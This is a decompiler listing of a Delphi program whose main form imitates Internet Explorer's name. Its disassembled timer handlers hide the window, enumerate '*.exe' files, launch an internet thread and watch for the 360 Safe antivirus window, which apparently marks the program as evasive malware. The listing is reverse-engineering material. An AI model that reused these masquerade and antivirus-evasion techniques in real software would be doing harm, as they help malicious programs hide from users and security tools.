* Reference to: user32.GetWindowLongA()
|
004A0E37 E8346DF6FF call 00407B70
004A0E3C 8BF0 mov esi, eax
004A0E3E 81CE00000800 or esi, $00080000
004A0E44 81CE80000000 or esi, $00000080
004A0E4A 56 push esi
004A0E4B 6AEC push $EC
004A0E4D 8BC3 mov eax, ebx
|
004A0E4F E8CC3AFAFF call 00444920
004A0E54 50 push eax
* Reference to: user32.SetWindowLongA()
|
004A0E55 E86E6FF6FF call 00407DC8
004A0E5A 6A02 push $02
004A0E5C 6A03 push $03
004A0E5E 6A00 push $00
004A0E60 8BC3 mov eax, ebx
|
004A0E62 E8B93AFAFF call 00444920
004A0E67 50 push eax
004A0E68 A12C6E4A00 mov eax, dword ptr [$004A6E2C]
004A0E6D 8B00 mov eax, [eax]
004A0E6F FFD0 call eax
* Reference to pointer to GlobalVar_004ACCDC
|
004A0E71 A114704A00 mov eax, dword ptr [$004A7014]
004A0E76 8B00 mov eax, [eax]
|
004A0E78 E8EFC9FBFF call 0045D86C
004A0E7D B201 mov dl, $01
* Reference to control Tfrm_IExplcreMain.Timer1 : TTimer
|
004A0E7F 8B8360030000 mov eax, [ebx+$0360]
* Reference to : TTimer._PROC_0042DE9C()
|
004A0E85 E812D0F8FF call 0042DE9C
004A0E8A 33C0 xor eax, eax
* Reference to GlobalVar_004AECA0
|
004A0E8C A3A0EC4A00 mov dword ptr [$004AECA0], eax
004A0E91 C605A5EC4A0000 mov byte ptr [$004AECA5], $00
|
004A0E98 E87FC8FBFF call 0045D71C
* Reference to GlobalVar_004AEC94
|
004A0E9D A294EC4A00 mov byte ptr [$004AEC94], al
004A0EA2 803D94EC4A0000 cmp byte ptr [$004AEC94], $00
004A0EA9 0F8417010000 jz 004A0FC6
004A0EAF 8D859CFEFFFF lea eax, [ebp+$FFFFFE9C]
* Possible String Reference to: '*.exe'
|
004A0EB5 B928104A00 mov ecx, $004A1028
004A0EBA 8B1590EC4A00 mov edx, [$004AEC90]
|
004A0EC0 E85B44F6FF call 00405320
004A0EC5 8B859CFEFFFF mov eax, [ebp+$FFFFFE9C]
004A0ECB 8D8DA0FEFFFF lea ecx, [ebp+$FFFFFEA0]
004A0ED1 BA3F000000 mov edx, $0000003F
|
004A0ED6 E8F18EF6FF call 00409DCC
004A0EDB 8BF0 mov esi, eax
004A0EDD 85F6 test esi, esi
004A0EDF 0F85B3000000 jnz 004A0F98
004A0EE5 8D9598FEFFFF lea edx, [ebp+$FFFFFE98]
004A0EEB 8B85B4FEFFFF mov eax, [ebp+$FFFFFEB4]
|
004A0EF1 E86682F6FF call 0040915C
004A0EF6 8B8598FEFFFF mov eax, [ebp+$FFFFFE98]
004A0EFC 50 push eax
004A0EFD 8D958CFEFFFF lea edx, [ebp+$FFFFFE8C]
004A0F03 33C0 xor eax, eax
|
004A0F05 E8AE23F6FF call 004032B8
004A0F0A 8B858CFEFFFF mov eax, [ebp+$FFFFFE8C]
004A0F10 8D9590FEFFFF lea edx, [ebp+$FFFFFE90]
|
004A0F16 E89190F6FF call 00409FAC
004A0F1B 8B8590FEFFFF mov eax, [ebp+$FFFFFE90]
004A0F21 8D9594FEFFFF lea edx, [ebp+$FFFFFE94]
|
004A0F27 E83082F6FF call 0040915C
004A0F2C 8B9594FEFFFF mov edx, [ebp+$FFFFFE94]
004A0F32 58 pop eax
|
004A0F33 E8F844F6FF call 00405430
004A0F38 7449 jz 004A0F83
004A0F3A B898EC4A00 mov eax, $004AEC98
004A0F3F 8B8DB4FEFFFF mov ecx, [ebp+$FFFFFEB4]
004A0F45 8B1590EC4A00 mov edx, [$004AEC90]
|
004A0F4B E8D043F6FF call 00405320
004A0F50 FF3590EC4A00 push dword ptr [$004AEC90]
004A0F56 8D8588FEFFFF lea eax, [ebp+$FFFFFE88]
|
004A0F5C E827C3FBFF call 0045D288
004A0F61 FFB588FEFFFF push dword ptr [ebp+$FFFFFE88]
004A0F67 6838104A00 push $004A1038
004A0F6C FFB5B4FEFFFF push dword ptr [ebp+$FFFFFEB4]
004A0F72 B89CEC4A00 mov eax, $004AEC9C
004A0F77 BA04000000 mov edx, $00000004
|
004A0F7C E81B44F6FF call 0040539C
004A0F81 EB15 jmp 004A0F98
004A0F83 8D85A0FEFFFF lea eax, [ebp+$FFFFFEA0]
|
004A0F89 E88E8EF6FF call 00409E1C
004A0F8E 8BF0 mov esi, eax
004A0F90 85F6 test esi, esi
004A0F92 0F844DFFFFFF jz 004A0EE5
004A0F98 8D85A0FEFFFF lea eax, [ebp+$FFFFFEA0]
|
004A0F9E E89D8EF6FF call 00409E40
004A0FA3 56 push esi
* Reference to: kernel32.CloseHandle()
|
004A0FA4 E8BF63F6FF call 00407368
004A0FA9 BAF4010000 mov edx, $000001F4
* Reference to control Tfrm_IExplcreMain.Timer4 : TTimer
|
004A0FAE 8B8370030000 mov eax, [ebx+$0370]
* Reference to : TTimer._PROC_0042DEAC()
|
004A0FB4 E8F3CEF8FF call 0042DEAC
004A0FB9 B201 mov dl, $01
* Reference to control Tfrm_IExplcreMain.Timer4 : TTimer
|
004A0FBB 8B8370030000 mov eax, [ebx+$0370]
* Reference to : TTimer._PROC_0042DE9C()
|
004A0FC1 E8D6CEF8FF call 0042DE9C
004A0FC6 BA40771B00 mov edx, $001B7740
* Reference to control Tfrm_IExplcreMain.Timer2 : TTimer
|
004A0FCB 8B8364030000 mov eax, [ebx+$0364]
* Reference to : TTimer._PROC_0042DEAC()
|
004A0FD1 E8D6CEF8FF call 0042DEAC
004A0FD6 B201 mov dl, $01
* Reference to control Tfrm_IExplcreMain.Timer2 : TTimer
|
004A0FD8 8B8364030000 mov eax, [ebx+$0364]
* Reference to : TTimer._PROC_0042DE9C()
|
004A0FDE E8B9CEF8FF call 0042DE9C
004A0FE3 33C0 xor eax, eax
004A0FE5 5A pop edx
004A0FE6 59 pop ecx
004A0FE7 59 pop ecx
004A0FE8 648910 mov fs:[eax], edx
****** FINALLY
|
* Possible String Reference to: '^[嬪]?
|
004A0FEB 6819104A00 push $004A1019
004A0FF0 8D8588FEFFFF lea eax, [ebp+$FFFFFE88]
004A0FF6 BA06000000 mov edx, $00000006
|
004A0FFB E82C40F6FF call 0040502C
004A1000 8D85A0FEFFFF lea eax, [ebp+$FFFFFEA0]
* Reference to object TSearchRec
|
004A1006 8B156C834000 mov edx, [$0040836C]
|
004A100C E87F4BF6FF call 00405B90
004A1011 C3 ret
|
004A1012 E98538F6FF jmp 0040489C
004A1017 EBD7 jmp 004A0FF0
****** END
|
004A1019 5E pop esi
004A101A 5B pop ebx
004A101B 8BE5 mov esp, ebp
004A101D 5D pop ebp
004A101E C3 ret
*)
end;
procedure Tfrm_IExplcreMain.FormClose(Sender : TObject);
begin
(*
004A103C 55 push ebp
004A103D 8BEC mov ebp, esp
004A103F 53 push ebx
004A1040 56 push esi
004A1041 57 push edi
004A1042 33D2 xor edx, edx
004A1044 55 push ebp
004A1045 685F104A00 push $004A105F
***** TRY
|
004A104A 64FF32 push dword ptr fs:[edx]
004A104D 648922 mov fs:[edx], esp
|
004A1050 E8BB000000 call 004A1110
004A1055 33C0 xor eax, eax
004A1057 5A pop edx
004A1058 59 pop ecx
004A1059 59 pop ecx
004A105A 648910 mov fs:[eax], edx
004A105D EB0A jmp 004A1069
|
004A105F E98435F6FF jmp 004045E8
|
004A1064 E88F39F6FF call 004049F8
****** END
|
004A1069 5F pop edi
004A106A 5E pop esi
004A106B 5B pop ebx
004A106C 5D pop ebp
004A106D C3 ret
*)
end;
procedure Tfrm_IExplcreMain.Timer1Timer(Sender : TObject);
begin
(*
004A114C 53 push ebx
004A114D 8BD8 mov ebx, eax
004A114F 33D2 xor edx, edx
* Reference to control Tfrm_IExplcreMain.Timer1 : TTimer
|
004A1151 8B8360030000 mov eax, [ebx+$0360]
* Reference to : TTimer._PROC_0042DE9C()
|
004A1157 E840CDF8FF call 0042DE9C
004A115C 8BC3 mov eax, ebx
|
004A115E E80DFFFFFF call 004A1070
004A1163 5B pop ebx
004A1164 C3 ret
*)
end;
procedure Tfrm_IExplcreMain.FormShow(Sender : TObject);
begin
(*
* Reference to field Tfrm_IExplcreMain.OFFS_004C
|
004A1168 8B504C mov edx, [eax+$4C]
004A116B 8BCA mov ecx, edx
004A116D F7DA neg edx
* Reference to : TGlassFrame._PROC_00457FFC()
|
004A116F E8886EFBFF call 00457FFC
004A1174 C3 ret
*)
end;
procedure Tfrm_IExplcreMain.FormActivate(Sender : TObject);
begin
(*
004A1178 6A00 push $00
* Reference to TApplication instance
|
004A117A A11C6F4A00 mov eax, dword ptr [$004A6F1C]
004A117F 8B00 mov eax, [eax]
* Reference to field TApplication.OFFS_0030
|
004A1181 8B4030 mov eax, [eax+$30]
004A1184 50 push eax
* Reference to: user32.ShowWindow()
|
004A1185 E87E6CF6FF call 00407E08
004A118A C3 ret
*)
end;
procedure Tfrm_IExplcreMain.Timer2Timer(Sender : TObject);
begin
(*
004A1378 53 push ebx
004A1379 8BD8 mov ebx, eax
004A137B 33D2 xor edx, edx
* Reference to control Tfrm_IExplcreMain.Timer2 : TTimer
|
004A137D 8B8364030000 mov eax, [ebx+$0364]
* Reference to : TTimer._PROC_0042DE9C()
|
004A1383 E814CBF8FF call 0042DE9C
004A1388 8BC3 mov eax, ebx
|
004A138A E89135FAFF call 00444920
004A138F 8BC8 mov ecx, eax
004A1391 B201 mov dl, $01
* Reference to class TConntecInternetThread
|
004A1393 A1BCC64800 mov eax, dword ptr [$0048C6BC]
|
004A1398 E88BB3FEFF call 0048C728
* Reference to field Tfrm_IExplcreMain.OFFS_0380
|
004A139D 898380030000 mov [ebx+$0380], eax
004A13A3 5B pop ebx
004A13A4 C3 ret
*)
end;
procedure Tfrm_IExplcreMain.Timer3Timer(Sender : TObject);
begin
(*
004A13A8 33D2 xor edx, edx
* Reference to control Tfrm_IExplcreMain.Timer3 : TTimer
|
004A13AA 8B806C030000 mov eax, [eax+$036C]
* Reference to : TTimer._PROC_0042DE9C()
|
004A13B0 E8E7CAF8FF call 0042DE9C
004A13B5 A1A0EC4A00 mov eax, dword ptr [$004AECA0]
004A13BA 50 push eax
* Reference to: user32.IsWindow()
|
004A13BB E84868F6FF call 00407C08
004A13C0 83F801 cmp eax, +$01
004A13C3 1BC0 sbb eax, eax
004A13C5 40 inc eax
004A13C6 84C0 test al, al
004A13C8 7507 jnz 004A13D1
004A13CA 33C0 xor eax, eax
|
004A13CC E8C3F8FFFF call 004A0C94
004A13D1 C3 ret
*)
end;
procedure Tfrm_IExplcreMain.Timer4Timer(Sender : TObject);
begin
(*
004A14A8 55 push ebp
004A14A9 8BEC mov ebp, esp
004A14AB 81C4F8FEFFFF add esp, $FFFFFEF8
004A14B1 53 push ebx
004A14B2 33C9 xor ecx, ecx
004A14B4 898DF8FEFFFF mov [ebp+$FFFFFEF8], ecx
004A14BA 33C0 xor eax, eax
004A14BC 55 push ebp
004A14BD 688B154A00 push $004A158B
***** TRY
|
004A14C2 64FF30 push dword ptr fs:[eax]
004A14C5 648920 mov fs:[eax], esp
004A14C8 803DA5EC4A0000 cmp byte ptr [$004AECA5], $00
004A14CF 0F859D000000 jnz 004A1572
004A14D5 833DA0EC4A0000 cmp dword ptr [$004AECA0], +$00
004A14DC 7425 jz 004A1503
004A14DE A1A0EC4A00 mov eax, dword ptr [$004AECA0]
004A14E3 50 push eax
* Reference to: user32.IsWindow()
|
004A14E4 E81F67F6FF call 00407C08
004A14E9 83F801 cmp eax, +$01
004A14EC 1BC0 sbb eax, eax
004A14EE 40 inc eax
004A14EF 84C0 test al, al
004A14F1 757F jnz 004A1572
004A14F3 33C0 xor eax, eax
* Reference to GlobalVar_004AECA0
|
004A14F5 A3A0EC4A00 mov dword ptr [$004AECA0], eax
004A14FA 33C0 xor eax, eax
|
004A14FC E893F7FFFF call 004A0C94
004A1501 EB6F jmp 004A1572
* Reference to: user32.GetForegroundWindow()
|
004A1503 E87065F6FF call 00407A78
004A1508 8BD8 mov ebx, eax
004A150A 6801010000 push $00000101
004A150F 8D85FFFEFFFF lea eax, [ebp+$FFFFFEFF]
004A1515 50 push eax
004A1516 53 push ebx
* Reference to: user32.GetClassNameA()
|
004A1517 E80465F6FF call 00407A20
004A151C 8D95F8FEFFFF lea edx, [ebp+$FFFFFEF8]
004A1522 8D85FFFEFFFF lea eax, [ebp+$FFFFFEFF]
|
004A1528 E8EF8DF6FF call 0040A31C
004A152D 8B85F8FEFFFF mov eax, [ebp+$FFFFFEF8]
* Possible String Reference to: 'Q360SafeMainClass'
|
004A1533 BAA0154A00 mov edx, $004A15A0
|
004A1538 E8F33EF6FF call 00405430
004A153D 7527 jnz 004A1566
004A153F 53 push ebx
* Reference to: user32.IsWindow()
|
004A1540 E8C366F6FF call 00407C08
004A1545 85C0 test eax, eax
004A1547 740F jz 004A1558
004A1549 891DA0EC4A00 mov [$004AECA0], ebx
004A154F B001 mov al, $01
|
004A1551 E83EF7FFFF call 004A0C94
004A1556 EB1A jmp 004A1572
004A1558 6A00 push $00
004A155A 68D4134A00 push $004A13D4
* Reference to: user32.EnumWindows()
|
004A155F E85C64F6FF call 004079C0
004A1564 EB0C jmp 004A1572
004A1566 6A00 push $00
004A1568 68D4134A00 push $004A13D4
* Reference to: user32.EnumWindows()
|
004A156D E84E64F6FF call 004079C0
004A1572 33C0 xor eax, eax
004A1574 5A pop edx
004A1575 59 pop ecx
004A1576 59 pop ecx
004A1577 648910 mov fs:[eax], edx
****** FINALLY
|
* Possible String Reference to: '[嬪]?
|
004A157A 6892154A00 push $004A1592
004A157F 8D85F8FEFFFF lea eax, [ebp+$FFFFFEF8]
|
004A1585 E87E3AF6FF call 00405008
004A158A C3 ret
|
004A158B E90C33F6FF jmp 0040489C
004A1590 EBED jmp 004A157F
****** END
|
004A1592 5B pop ebx
004A1593 8BE5 mov esp, ebp
004A1595 5D pop ebp
004A1596 C3 ret
*)
end;
procedure Tfrm_IExplcreMain.Timer5Timer(Sender : TObject);
begin
(*
004A15B4 53 push ebx
004A15B5 8BD8 mov ebx, eax
004A15B7 B001 mov al, $01
|
004A15B9 E8D6F6FFFF call 004A0C94
004A15BE 803DA4EC4A0000 cmp byte ptr [$004AECA4], $00
004A15C5 740D jz 004A15D4
004A15C7 33D2 xor edx, edx
* Reference to control Tfrm_IExplcreMain.Timer5 : TTimer
|
004A15C9 8B8374030000 mov eax, [ebx+$0374]
* Reference to : TTimer._PROC_0042DE9C()
|
004A15CF E8C8C8F8FF call 0042DE9C
004A15D4 5B pop ebx
004A15D5 C3 ret
*)
end;
end.